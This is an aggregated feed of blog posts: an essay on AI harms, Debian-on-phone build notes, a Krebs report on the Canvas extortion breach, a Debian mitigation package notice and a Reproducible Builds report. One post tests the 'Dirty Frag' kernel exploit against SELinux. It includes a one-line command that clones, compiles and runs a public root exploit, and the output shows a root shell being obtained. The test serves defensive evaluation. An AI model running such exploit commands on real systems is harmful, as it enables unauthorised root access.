The trend in replacing people has been making people work longer. If you force all employees to work 60 hour weeks then that can theoretically allow hiring fewer people than having 40 hour weeks. For some work that applies but for skilled work it mostly doesn’t as productivity and work quality on average drops when people work more than 40 hours in a week.

Another trend for exploiting people is having a low minimum wage and making accommodation expensive so that many people need to work two jobs. What we need is legislation to restore the situation in the 70s where a single full time job was sufficient to provide for a family. The low minimum wage and high expenses for many things is a problem that’s been slowly developing over the course of decades while being mostly ignored by journalists. If they could concentrate on the real issues that are hurting workers today they could incite political action to fix these problems.

Academic Cheating

There is no shortage of ways of cheating in school and university. There are people who are paid to write essays, mobile phones are used for cheating in exams, etc. Getting an “AI” to write essays makes it easier to cheat for the essay writing part but does so with lower quality and in a less stealthy way.

What’s the worst case scenario? That we have to change to oral exams for all university subjects?

In the US the average annual price for tuition at a university is apparently $25,000, if each student had individually supervised assessment for their exams at a cost of $100 per hour it would make the degree cost 4% more. The cost of university in the US is unreasonably high and that’s a problem that needs to be fixed, but a hypothetical case of increasing the price by 4% isn’t going to be a major part of it.

Weak Arguments Against “AI”

Computer Security Attacks

There have been many claims made that “AI” will break the security of all systems and cause the type of disruption that was previously predicted for year 2000. Bruce Schneier has written a good analysis of the issues including how “AI” can be used by both attackers and defenders [10], he doesn’t have a strong conclusion on whether the net result will be good or bad but his article does make it clear that the result is not going to be a total disaster.

While I was working on this post I read another post by Bruce Schneier that was significantly more negative about this issue [11]. While I still don’t think this will destroy civilisation I found his other post convincing enough to move computer security from the bad argument section to the weak argument section.

Spidering the Web to Death

There are issues of bots from “AI” companies doing a bad job of trying to download all the Internet’s content and using a lot of resources. When it was just the major search engines and the Wayback Machine doing it the load was small due to having a small number of organisations that were very good at the way they did it having evolved practices over many years. Now we have a lot of idiots doing it badly and repeatedly hitting generated content.

This is really annoying but is something that we can deal with. Currently my blog and many other sites are hosted on a Hetzner server with a E3-1271 v3 CPU with 32G of RAM and there are occasions where more than half the CPU power is being used to service web requests from such systems. Even on the “server bidding” (renting servers previously used by other customers) Hetzner isn’t offering systems so slow nowadays, the slowest they offer is about 20% faster than that. This is something that can be dealt with by spending a little more on hosting until the companies doing that go bankrupt.

I’m sure this is a serious problem for some people, but for most people it’s not a big deal. Also hostile traffic on the Internet is something we have all had to deal with as a part of life since the mid to late 90s.

RAM Prices

The unreasonably high prices for RAM are annoying and hurt the development of useful computer projects. Big companies can afford it, even with current high prices and large quantities of RAM used for some servers it’s still not significant. But it is a major issue for hobbyists and small projects. Things like setting up a dozen test VMs for FOSS development are now too expensive for many people who develop software in their spare time.

But this is a temporary thing, if AI companies were to keep buying RAM at high rates for a few years companies would just manufacture more of it to meet demand. In some situations capitalism can work.

Environmental Damage

There are many people claiming that power used by data centers for “AI” will lead to environmental damage, using power and water when there isn’t enough.

The trend of computer hardware is to get smaller and faster. It hasn’t been going as fast as it used to in many areas but it hasn’t stopped either and it’s an exponential trend. There has been an increase in data centers (DCs) for “AI” use as the use has been increasing faster than the hardware gets smaller. Eventually they will stop increasing faster than advances in hardware and software can match and the size of DCs will decrease.

As the production of renewable energy is increases the environmental cost of energy hungry industries decreases. In a few years this won’t be an issue anyone is bothered about.

False Claims About Danger as PR

Jamie McClelland makes an interesting claim that the AI companies are pushing dangers of “AI” as a method of PR [12]. That seems plausible and combined with the tendency of many journalists to just massage press releases from companies into articles could be the reason for a lot of the bad arguments against AI.

Good Arguments Against AI

Spam Everywhere

I’ve previously written about Communication and Hostile AIs [13]. I think that filling all communication channels with rubbish is a denial of service attack against society.

In the past communication took some effort, even the simplest email that was directly targeted at the recipient took some human effort and that reduced it’s frequency. I get a lot of spam saying something like “I see your web site doesn’t rank in the top for Google searches” while my web site in fact rates well and the actor named Russell Coker is ranking below me, so I know that such spam hasn’t had the minimum of human involvement. Now a spammer who wanted to do a better job could get an LLM written spam for every target so the message was specifically aimed at them and would take much longer to be recognised by a human as spam and would also avoid most anti-spam software.

Searching for businesses used to be easy, the phone book had listings for them and there was a real cost to being in the book as well as humans actively trying to stop fraud. Creating fake web sites to get business isn’t too difficult but it’s also not trivial at the moment and such fake sites won’t look complete. Now with LLMs it’s possible to create hundreds of sites that have content and look reasonable without human involvement. Instead of the small number of suicides and homicides inspired by “AI” chat systems we should probably be concerned about people who need psychological or medical advice being misled by bogus web sites created as part of fraud campaigns. Imagine people searching for mental health assistance finding web sites run by cults who oppose psychology as a profession. Imagine people searching for basic medical advice such as how to cook a healthy meal getting sucked in to web sites that start sane and then lead people to Ivermectin as a universal medicine.

LLMs have the potential to take spam from quick and simple attacks to large scale targeted fraud aimed at people and organisations that don’t have the resources to defend against it. There have been many reports of CEO impersonation fraud against major corporations aiming to steal hundreds of thousands of dollars and fraud against individuals who are persuaded to get amounts like $50,000 to help a relative who is allegedly in a difficult situation. But if every corner store experienced the same type of attack that CEOs experience and if every child had someone trying to steal the pocket money in the same way that relatively wealthy people are being targeted now it would really change things.

David Brin wrote an insightful and informative blog post about this focusing on how “AI” generated content is being allowed to destroy YouTube [14].

Deep Fakes

There is some overlap between filling all communications channels with rubbish (fake news etc) and deep fake. Making a fake photo of a politician or celebrity to lobby for legislative changes is a real issue but it’s not what most people think of when the term “deep fake” is used.

Using photo and video faking targeting non-consenting people is a serious issue. It’s not just fake porn (which is a major issue and will cause some suicides) as there are many other possibilities. Fake videos showing behaviour that justifies sacking people from their jobs is going to become an issue, for people in public facing positions even proof that the videos are fake won’t necessarily help them.

Will we find ourselves in a situation where every politician gets deep-fake porn made of them and the only people who run for public office are ones who are cool with that? Will positions of leadership in the technology industry be restricted to people who aren’t bothered by having the most depraved fake porn made of them?

The Justice System

We have seen a lot of evidence of law enforcement and the court system based on bias leading to bad results. The Innocence Project attempts to correct that and it’s web site documents some of the things that have gone wrong [15]. Using “AI” systems to do some of the work of law enforcement by training computers on the flawed results of current systems can entrench bias and also make it harder to spot.

When determining whether someone should be considered a suspect or whether a prisoner should be eligible for parole the number of factors that a human can use is limited. But a computer can take many more factors into account so the issues of whether inappropriate factors are being used can be masked. Computers are also unable to explain decisions that they made and are also able to come up with better fake reasons.

In the past there have been racist policies in the US about banks not lending to people living in suburbs where most houses were owned by non-white people, these policies were documented and the documents have become part of the historical record showing racist policies. If a LLM decides not to lend money to people based on mathematical correlations it determined based on historical banking practices it could assign negative weights to factors such as non-English names and implement the racism in a large array of numbers with no proof.

The current cases of lawyers getting LLM systems to do some of their work and having their incompetence revealed when the computer generated work is shown to be ridiculously bad are amusing. But that is not the real problem. The real problems will start when the computers in police cars start flagging every car owned by a non-write person as having a “probable cause” for a drug stop.

Technically Not Financial Fraud

The majority of the ecosystem around “AI” is a financial scam [16]. There are companies and individuals doing good things with machine learning some of which is based on hardware and software developed as part of this ecosystem. But the majority of it has no plausible path to profits and a the future of it inevitably ends with some bankruptcies. There are circular flows of money that have the major cloud providers and NVidia looped in, when the values of these companies correct it will become apparent that they have all burned a lot of money keeping this running and all the senior people have got a share of it (the entire purpose of stock options is to allow senior people to suck money out of the company). Then every cloud provider will increase costs while under chapter 11 and all the companies that depend on them will pay whatever it takes. That includes all major companies and most governments. Unlike the dot-com boom and crash and the housing crash the coming financial crash will impact every company that we deal with and most governments. So the people in first-world countries will effectively be taxed to pay for this scam while the executives go party in Monaco. This may seem like an extreme claim but it all happened before with the dot com crash and the housing market crash.

The CEO class has an ongoing practice of doing things that aren’t crimes because they lobby (bribe) politicians to make them legal. So the current stock market shenanigans around “AI” don’t seem to involve things that governments consider to be crimes. But any normal person might be surprised to learn that such things are legal and most people would vote for such things to be crimes if they had the opportunity.

A global financial crisis is the least of the problems that seem likely to afflict society from “AI” systems. But it will be more immediately obvious when it happens – which could be this year!

Propaganda

Creating art requires skills that the type of people who want to create propaganda tend to lack. “AI” technologies allow creating “art” that is based on mathematical models of actual art to the requirements of the person running the program.

I have seen the term “AI Fascism” used to describe the use of “AI” to help authoritarian governments. I am dubious about whether it deserves that term and while every article I’ve read about the topic has had some good points I thought that they were all weak points.

But there are lots of ways that governments can abuse their populations without going full fascist. In the last century there were lots of truly terrible governments that didn’t even make the top 10 of fascism.

AI Sycophants

Bruce Schneier wrote an informative blog post about AI Chatbots and Trust which focused on sycophantic chatbots [17]. We have seen a lot of evidence of terrible behaviour and stupid decisions from rich people due to having no negative consequences for bad choices. The vast majority of the history of kings concerns bad decisions made by such people. A future where middle class and poor people can make the same bad decisions as rich people wouldn’t be good.

Good Things About ML

Machine Learning (abbreviated as ML) can do useful things. It’s not just Large Language Models (LLMs) such as ChatGPT etc. There are also ML systems that can analyse images and other data sets.

I have found ChatGPT to be very useful for making suggestions for improving blog posts. I don’t get it to write anything just ask for suggestions. It has pointed out things that I missed such as when I didn’t include the price when reviewing a car because the car in question was much more expensive than I will ever pay, the price wasn’t relevant to me but would be to some readers. It has also made useful suggestions about structure of blog posts, repeating points, and having a good conclusion. It has some downsides which include trying to erase my voice from my writing, suggesting that the rhetorical question “does email suck?” is unprofessional.

I have worked for a company that used ML systems to analyse driver performance and alert people if a driver is falling asleep, using a phone, or otherwise seems unable to drive safely. Their business model involved a human reviewing the images from the drivers the computer flagged and then determining who is actually doing the wrong thing. This seems a good use of the technology.

I have also worked for a company that used ML systems to analyse the performance of bank employees and detect potentially fraudulent behaviour. Preventing crime seems to be clearly a good thing and in this case the manager of the employee in question would review the evidence to make sure that they weren’t being falsely accused.

Conclusion

I don’t think that the problems with managing the changes that so called “AI” is introducing are particularly new. An example of how society handles change that’s worth considering is car safety. The seat belt first became mandatory for aeroplanes in some jurisdictions in 1928. The Model T Ford is widely regarded as the first vehicle to start a mass market for cars and it was released in 1925. So if society acted in a reasonable way then for the majority of mass market cars seat belts would have been a standard feature. However seat belts were first made compulsory in 1970 in Victoria Australia and there are still people who think that they are safer without seat belts! The delay in adoption of car seat belts is only one example of needless deaths caused by not taking reasonable measures for car safety but it’s one that’s easy to demonstrate and measure.

The difference between past problems like car safety and the current problems of “AI” is that the “AI” problems will be more pervasive. Most of my history as a car driver and car passenger was in cars that are much less safe than cars made in the last 10 years. But partly through luck I’ve never been in a serious crash so being in cars that wouldn’t have given me a low probability of surviving a freeway speed crash didn’t affect me. There is no possibility that through any combination of luck and skill someone could avoid the downsides of “AI”. If nothing else the results of elections will be affected and no-one can avoid that.

As a society we really need to address the real issues related to “AI” which in some cases requires legislation.

MESystemd, Mobile Linux, and Containers

I’ve had some problems running apps I want on my Furilabs FLX1s [1], so I decided to install some container environments to test various versions. I started with Debian/Testing so I can test the build process for some packages I’m about to upload to Unstable.

Systemd Issues

When running debootstrap testing testing to setup the chroot the process aborted with errors including the following from the systemd postinst:

Failed to enable units: Protocol driver not attached.
Cannot open '/etc/machine-id': Protocol driver not attached

This turned out to be from trying to run systemctl in the postinst, I just removed the “set -e” line from /chroot/testing/var/lib/dpkg/info/systemd.postinst and kept on going (I’m not planning to actually use systemd so it’s failure to setup wasn’t a problem).

Then I installed a bunch of -dev packages needed to build my package which had a dependency chain that included udev leading to the following error:

Setting up udev (260.1-1) ...
Failed to chase and open directory '/etc/udev/hwdb.d', ignoring: Protocol driver not attached
Failed to chase and open directory '/usr/lib/udev/hwdb.d', ignoring: Protocol driver not attached

Udev is also a part of systemd.

Googling for this turned up a closed systemd bug about this indicating that it has a minimum kernel version of 5.10 [2]. The Furiphone has kernel 4.19.325-furiphone-radon due to being based on Android.

Checking the kernel version isn’t that hard to do, if the systemd programs in question checked the version and reported “can’t run on kernels prior to 5.10 then it would avoid a lot of confusion – and also bug reports that the systemd developers don’t want.

Some Debian package dependencies can probably do with revision. Installing the packages “libkdb3-dev libkf5archive-dev qtdeclarative5-dev qtpositioning5-dev qttools5-dev” ideally wouldn’t have a dependency chain leading to udev.

The Furilabs people appear to have patched the latest Debian version of systemd to work with the older kernels, the version is currently 260.1-1+furios0+git20260425023744.8401044.forky.production.

Compile Times

I got this working by just editing every postinst script and either removing the “set -e” or adding an “exit 0” at the top, I don’t need things to be configured properly for a running OS I just need the files in the right locations for a container.

One issue I discovered when I started compiling is that it was only running on 1 core and the “nprocs” program was returning “1”. The “lscpu” program showed that only 1 of the 8 cores was online, it was a single Cortex-A78 core. Some combination of putting it in “caffeine mode” and having the screen on enabled all 6*Cortex-A55 and 2*Cortex-A78 cores.

The below table compares compiling Harbour-Amazfish on the Furiphone with all 8 CPU cores active, my E5-2696 v4 workstation (almost the fastest socket 2011-3 CPU ever made), running ARM64 software emulation on a system with two E5-2699A v4 CPUs, and a Radxa 8 core ARM SBC (which I will review in a future blog post).

Given that the source apparently limits the parallelism to less than 7 cores on average it’s pretty impressive for the elapsed time to be only 2.5* longer on the phone. Emulating the ARM64 build at about 4* the system CPU time is impressive too, as the system has 4.5* as many CPU cores it could theoretically compile ARM code faster than the native ARM hardware I own for any project that uses enough cores.

System User time System time Elapsed %CPU
Furiphone 2252.76 164.51 7:00.88 574
E5-2696 v4 workstation 679.64 119.07 1:58.63 673
2*22core Intel CPUs (qemu) 8476.65 113.14 10:24.57 1375
Radxa 2011.45 239.40 6:25.55 583

365 TomorrowsBeliefs

Author: Harold Loomis The coffee shop’s windows were broken and decades of dust lay on the floor. Coffee had not flowed here since the eradication. Nobody was around to use it after that. The door creaked on its rusty hinges as the silent fluid-servo driven hand gave it a push. It was 5.71 meters tall, […]

The post Beliefs appeared first on 365tomorrows.

,

Cryptogram Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia

Evidence of them has been found by analyzing DNA in the seawater.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Cryptogram Insider Betting on Polymarket

Insider trading is rife on Polymarket:

Analysis by the Anti-Corruption Data Collective, a non-profit research and advocacy group, found that long-shot bets—­defined as wagers of $2,500 or more at odds of 35 percent or less—­on the platform had an average win rate of around 52 percent in markets on military and defense actions.

That compares with a win rate of 25 percent across all politics-focused markets and just 14 percent for all markets on the platform as a whole.

It is absolutely insane that this is legal. We already know how insider betting warps sports. Insider betting warping politics—and military actions—is orders of magnitude worse.

Worse Than FailureError'd: Null Null Null

The single most common category of entries for this column is failed handling of NaN, null and undefined. Almost exclusively from javascript in web pages, sometimes in node servers, and almost never any other languages or frameworks. They're getting a bit repetitive but it's our solemn duty to call out failure where we find it. So if you send us one of these, make sure it identifies the source!

"If you want something you've never had, do something you've never done" exhorted Ben.

15d2acdeb1844f2fb6dcd79699dee683

"Dashed Hope for Jennifer Null," titled an entry from some guy[sic]. "As recently linked from TDWTF article "Not for Nullthing", not only names can break computer systems, but also article content." Stretching, but we'll allow it.

5d69cd67830c4a3789e96f556bb542bf

"Where does Batman go on holiday?" asked Morgan. "Nananananana... Nowhere!"

15345eee6a7d4fe383cecf5cb74d1aa2

"UBER is ready for driverless vehicles..." Bruce C. "Uber is getting so big, they can't even keep track of their driver's names."

30fbd331dde44f639735138146d97f51

"Well at least the reason wasn't null or NaN," wrote Steve W. regarding CenturyLink. "I've been trying for weeks to use their web page to change my (incorrect billing address). Such progress."

eb3472b715ab4124896b37d7ca47eaec

Additional entries on the topic from
Dan : "we're fresh out of null"
Henrik : "What is this null music streaming service"
Mike : "Name: undefined"
Laks : "In this app, every new user defaults to a nullptr."
and
Jim : "Think I'll buy $NaCar with this refund!"
and many others were all appreciated and noted.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

365 TomorrowsYour City

Author: Philip G Hostetler You’re in a city, it’s not that it’s deserted or abandoned, it’s that it’s been built entirely for you. It’s completely devoid of vehicles, people and animals though all of your needs and desires were present, just lying in wait. You passed by an empty coffee shop, you wanted to smell […]

The post Your City appeared first on 365tomorrows.

MEDirty Frag on Debian and SE Linux

Hot on the heels of the Copy Fail vulnerability [1] there is a new vulnerability Dirty Frag [2] (I linked to the Alma Linux page because it’s the first one I saw and it explains things well).

The Test System

The test system was running kernel 6.19.14+deb14-amd64 and had the configuration after my last test of Copy Fail which was a default configuration with the following commands run:

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
semanage login -m -s root -r s0 root
# logout and login again
semodule -X 100 -r unconfined

Strict Policy is Not Vulnerable

I did a quick test on a Debian SE Linux system with a user running as user_t (which is often referred to as “strict policy”) and got the following result:

test@testing1:~/t$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 11.47 MiB/s, done.
Resolving deltas: 100% (9/9), done.
dirtyfrag: failed (rc=1)
test@testing1:~/t/dirtyfrag$ ./exp 
dirtyfrag: failed (rc=1)

I checked the audit log and saw the following:

# audit2allow -al
#============= user_t ==============
allow user_t self:rxrpc_socket create;
allow user_t self:user_namespace create;

It seems that the rxrpc_socket access is the main thing.

I did a search for domains permitted to use that class on a system without unconfined domains and saw the following:

# sesearch -A -c rxrpc_socket
allow daemon init_t:rxrpc_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:rxrpc_socket getattr;
allow sosreport_t domain:rxrpc_socket getattr;
allow sysadm_t domain:rxrpc_socket getattr;

This configuration doesn’t appear to be vulnerable, at least to this form of the attack.

Unconfined Domains

I reinstalled the unconfined policy with the following command and assigned it to the user test2 with the following commands:

semodule -X 100 -i /usr/share/selinux/default/unconfined.pp.bz2
semanage login -a -s unconfined_u test2
restorecon -R -v -F /home/test2

I then tested the exploit as user test2 and got the following result:

test2@testing1:~$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 16.57 MiB/s, done.
Resolving deltas: 100% (9/9), done.
# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# 

The kernel message log had the following lines from the time of the attack:

[ 1310.861545] Initializing XFRM netlink socket
[ 1310.909048] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni))
[ 1310.909935] alg: No test for echainiv(authencesn(hmac(sha256),cbc(aes))) (echainiv(authencesn(hmac-sha256-lib,cbc-aes-aesni)))
[ 1318.353602] process 'su' launched '/bin/sh' with NULL argv: empty string added

Conclusion

It seems that we will be getting a lot of these so running SE Linux users as user_t is the right thing to do for servers and multi user systems.

xkcdCrystal Gazing

Krebs on SecurityCanvas Breach Disrupts Schools & Colleges Nationwide

An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service’s login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.

A screenshot shared by a reader showing the extortion message that was shown on the Canvas login page today.

Canvas parent firm Instructure responded to today’s defacement attacks by disabling the platform, which is used by thousands of schools, universities and businesses to manage coursework and assignments, and to communicate with students.

Instructure acknowledged a data breach earlier this week, after the cybercrime group ShinyHunters claimed responsibility and said they would leak data on tens of millions of students and faculty unless paid a ransom. The stated deadline for payment was initially set at May 6, but it was later pushed back to May 12.

In a statement on May 6, Instructure said the investigation so far shows the stolen information includes “certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as as messages among users.” The company said it found no evidence the breached data included more sensitive information, such as passwords, dates of birth, government identifiers or financial information.

The May 6 update stated that Canvas was fully operational, and that Instructure was not seeing any ongoing unauthorized activity on their platform. “At this stage, we believe the incident has been contained,” Instructure wrote.

However, by mid-day on Thursday, May 7, students and faculty at dozens of schools and universities were flooding social media sites with comments saying that a ransom demand from ShinyHunters had replaced the usual Canvas login page. Instructure responded by pulling Canvas offline and replacing the portal with the message, “Canvas is currently undergoing scheduled maintenance. Check back soon.”

“We anticipate being up soon, and will provide updates as soon as possible,” reads the current message on Instructure’s status page.

While the data stolen by ShinyHunters may or may not contain particularly sensitive information (ShinyHunters claims it includes several billion private messages among students and teachers, as well as names, phone numbers and email addresses), this attack could hardly have come at a worse time for Instructure: Many of the affected schools and universities are in the middle of final exams, and a prolonged outage could be highly damaging for the company.

The extortion message that greeted countless Canvas users today advised the affected schools to negotiate their own ransom payments to prevent the publication of their data — regardless of whether Instructure decides to pay.

“ShinyHunters has breached Instructure (again),” the extortion message read. “Instead of contacting us to resolve it they ignored us and did some ‘security patches.'”

A source close to the investigation who was not authorized to speak to the press told KrebsOnSecurity that a number of universities have already approached the cybercrime group about paying. The same source also pointed out that the ShinyHunters data leak blog no longer lists Instructure among its current extortion victims, and that the samples of data stolen from Canvas customers were removed as well. Data extortion groups like ShinyHunters will typically only remove victims from their leak sites after receiving an extortion payment or after a victim agrees to negotiate.

Dipan Mann, founder and CEO of the security firm Cloudskope, slammed Instructure for referring to today’s outage as a “scheduled maintenance” event on its status page. Mann said Shiny Hunters first demonstrated they’d breached Instructure on May 1, prompting Instructure’s Chief Information Security Officer Steve Proud to declare the following day that the incident had been contained. But Mann said today’s attack is at least the third time in the past eight months that Instructure has been breached by ShinyHunters.

In a blog post today, Mann noted that in September 2025, ShinyHunters released thousands of internal University of Pennsylvania files — donor records, internal memos, and other confidential materials — through what the Daily Pennsylvanian and other outlets later determined was, in part, a Canvas/Instructure-mediated access path.

“Penn was the named victim,” Mann wrote. “Instructure was the mechanism. The incident was treated as a Penn-specific story by most of the national press and quietly handled by Instructure as a customer-specific matter. That framing was wrong then. It is dramatically more wrong in light of the May 2026 events, which now look like the planned escalation of an attack pattern that ShinyHunters had been working against Instructure’s environment for at least eight months prior. The September 2025 Penn breach was the proof of concept. The May 1, 2026 incident was the production run. The May 7, 2026 recompromise was ShinyHunters demonstrating publicly that the May 2 ‘containment’ did not happen.”

In February, a ShinyHunters spokesperson told The Daily Pennsylvanian that Penn failed to pay a $1 million ransom demand. On March 5, ShinyHunters published 461 megabytes worth of data stolen from Penn, including thousands of files such as donor records and internal memos.

ShinyHunters is a prolific and fluid cybercriminal group that specializes in data theft and extortion. They typically gain access to companies through voice phishing and social engineering attacks that often involve impersonating IT personnel or other trusted members of a targeted organization.

Last month, ShinyHunters relieved the home security giant ADT of personal information on 5.5 million customers. The extortion group told BleepingComputer they breached the company by compromising an employee’s Okta single sign-on account in a voice phishing attack that enabled access to ADT’s Salesforce instance. BleepingComputer says ShinyHunters recently has taken credit for a number of extortion attacks against high-profile organizations, including Medtronic, Rockstar Games, McGraw Hill, 7-Eleven and the cruise line operator Carnival.

The attack on Canvas customers is just one of several major cybercrime campaigns being launched by ShinyHunters at the moment, said Charles Carmakal, chief technology officer at the Google-owned Mandiant Consulting. Carmakal declined to comment specifically on the Canvas breach, but said “there are multiple concurrent and discrete ShinyHunters intrusion and extortion campaigns happening right now.”

Cloudskope’s Mann said what happens next depends largely on whether Instructure’s customers — the universities, K-12 districts, and education ministries paying for Canvas — choose to apply pressure or absorb the breach quietly.

“The history of education-vendor incidents suggests the path of least resistance is the second one,” he concluded.

Update, May 8, 11:05 a.m. ET: Instructure has published an incident update page that includes more information about the breach. Instructure said its Canvas portal is functioning normally again, and that the hackers exploited an issue related to Free-for-Teacher accounts.

“This is the same issue that led to the unauthorized access the prior week,” Instructure wrote. “As a result, we have made the difficult decision to temporarily shut down Free-for-Teacher accounts. These accounts have been a core part of our platform, and we’re committed to resolving the issues with these accounts.”

Instructure said affected organizations were notified on May 6.

“If your organization is affected, Instructure will contact your organization’s primary contacts directly,” the update states. “Please don’t rely on third-party lists or social media posts naming potentially affected organizations as those lists aren’t verified. Instructure will confirm validated information through direct outreach to all affected organizations.”

Update, May 11, 10:16 p.m. ET: Instructure posted an update saying they paid their extortionists in exchange for a promise to destroy the stolen data. “The data was returned to us,” the update reads. “We received digital confirmation of data destruction (shred logs). We have been informed that no Instructure customers will be extorted as a result of this incident, publicly or otherwise.”

Planet DebianDaniel Baumann: Debian: Linux Vulnerability Mitigation (Dirty Frag)

After Copy Fail [CVE-2026-31431] from last week, the new Linux local root privilege escalations of today are Dirty Frag (Part 1) aka Copy Fail 2 [CVE-2026-43284] and Dirty Frag (Part 2) [CVE-2026-43500].

For those who can not update to linux >= 7.0.4-1 that was uploaded to sid and contains the needed fixes (backports for trixie are available in trixie-fastforward-backports), or are waiting for backports and updates to older Debian releases, or can’t reboot on short notice, mitigations might be needed.

Given the current trend, it seems we will see more of these bugs in the future. Therefore, I’ve uploaded a new package linux-vulnerability-mitigation to sid containing the mitigation for both Copy Fail and Dirty Frag (with debconf multiselect).

Until it passed NEW, it can also be downloaded from here:

The package is architecture independent, has no dependencies, and can be installed on any version of Debian or Debian derivative.

Update: Updated text above and descriptions in linux-vulnerability-mitigation for Dirty Frag Part 2 [CVE-2026-43500].

,

Planet DebianReproducible Builds: Reproducible Builds in April 2026

Welcome to our April 2026 report from the Reproducible Builds project!

Our reports outline what we’ve been up to over the past month, highlighting items of news from elsewhere in the increasingly-important area of software supply-chain security. As ever, if you are interested in contributing to the Reproducible Builds project, please see the Contribute page on our website.

In this month’s report, we cover:

  1. Tor stateless relays and Reproducible Builds
  2. Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux
  3. Reproducible Builds at LinuxFest NorthWest
  4. Reproducibility issues in Rust binaries that embed random bytes
  5. Distribution work
  6. Patches
  7. diffoscope development
  8. Documentation updates
  9. Misc news


Tor stateless relays and Reproducible Builds

An interesting post was published on Tor Project blog by Osservatorio Nessuno OdV this month on “stateless relays”. These are stateless, diskless operating systems that are designed to be used as Tor exit relays. According to the post, which is titled A Server That Forgets: Exploring Stateless Relays:

For relay operators, this approach raises the security bar by enforcing better behaviors by design: […]

  1. Reproducibility. A system that doesn’t change between reboots is easier to verify and, eventually, to reproduce and audit.

Furthermore, using a Trusted Platform Module (TPM), could allow for greater integrity in the future:

Transparency logs. Once you have a measured boot chain, you can publish it. A relay operator provides a recipe for a reproducible build; anyone can recompute the expected hash and verify it matches what the TPM reports. An append-only transparency log can make these attestations publicly auditable. The Tor community could run an independent monitor to track this across the relay fleet.


Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux

Congratulations to the Civil Infrastructure Platform (CIP) for reaching their 10-year anniversary last month. CIP has been a supporter of Reproducible Builds for many years, and we have collaborated on a number of technical issues that overlap. As Chris Lamb mentions in CIP’s press release:

The collaboration between the Reproducible Builds project and CIP highlights a critical shift in how we approach industrial software. Through verifiability, CIP ensures that the open source foundation of our critical infrastructure is not only sustainable but also demonstrably secure. This commitment to transparency is vital for the trust and resilience required by critical systems over decades of operation.”


Reproducible Builds at LinuxFest NorthWest

Vagrant Cascadian and Chris Lamb hosted a table in the exposition hall at LinuxFest NorthWest 2026 this month in Bellingham, WA, USA, introducing many people to Reproducible Builds and answering questions both days of the conference.

In addition, Vagrant presented Beyond Trusting Open Source Software on Sunday afternoon, exploring the intersection of Free/Open Source Software, Reproducible Builds and Bootstrappable builds, and how they all reinforce each other. Vagrant’s slides are available online, including source code to build them reproducibly.


Reproducibility issues in Rust binaries that embed random bytes

Reproducible Builds developer kpcyrd opened a ticket on the Rustsec issue tracker regarding binaries that deliberately inject random bytes into their binaries “as a secret seed for a Hash Collision DoS mitigation.”

As kpcyrd notes in his message, this causes issues for reproducibility, and because the relevant end-user binaries are “mostly distributed pre-compiled through package managers, those binaries (and by extension the secret seed) are public knowledge”. kpcyrd goes on to note:

This is somewhat unique to Rust because Python/JavaScript doesn’t compile binaries, and Go (to my knowledge) is too restrictive during build for any library to pull something like this.


Distribution work

In Arch Linux this month, Robin Candau and Mark Hegreberg worked at adding a new repro tag/version to the Arch Linux Docker images providing a bit-for-bit reproducible image. Robin also shared a related announcement and implementation details on our mailing list.

Arch Linux developer Robin Candau posted a blog post announcing that “Arch Linux Now Has a Bit-for-Bit Reproducible Docker Image”. Robin mentions one interesting caveat:

to ensure reproducibility, the pacman [package manager] keys have to be stripped from the image, meaning that pacman is not usable out of the box in this image. While waiting to find a suitable solution to this technical constraint, we are therefore providing this reproducible image under a dedicated tag as a first milestone. []

The blog post was also discussed on Hacker News.


In Debian this month, 24 reviews of Debian packages were added, 7 were updated and 16 were removed this month adding to our knowledge about identified issues.

Vagrant Cascadian performed Non-Maintainer Uploads (NMUs) in Debian for several packages with outstanding patches over a year old jakarta-jmeter, wxmplot, critcl, vcsh and magic-wormhole-transit-relay.

In addition, Reproducible Builds developer Jochen Sprickerhof filed a bug against the APT package manager to request that “APT should ignore [a] 0 epoch when downloading or installing with a version specifier”. This is related to the special-case handling of the optional epoch prefix in Debian package version numbers.


In NixOS, Julien Malka presented Lila: Decentralized Build Reproducibility Monitoring for the Functional Package Management Model, a paper written together with Arnout Engelen at the Mining Software Repositories (MSR) ACM conference, where it was awarded the MSR 2026 FOSS Impact Award. Congratulations!


Lastly, in openSUSE, Michael Schroeder added reproducibility verification support in the Open Build Service [] and Bernhard M. Wiedemann posted another openSUSE monthly update for their reproducibility work there.


Patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where applicable or possible. This month, we wrote a large number of such patches, including:


diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes, including preparing and uploading versions, 316, 317 and 318 to Debian.

  • Chris Lamb:

    • Bump Standards-Version to 4.7.4. []
    • Correct ordering of python3-guestfs architecture restrictions. []
    • Limit python3-guestfs Build-Dependency to architectures that are not i386. []
    • Try to fix PYPI_ID_TOKEN debugging. []
  • Holger Levsen:

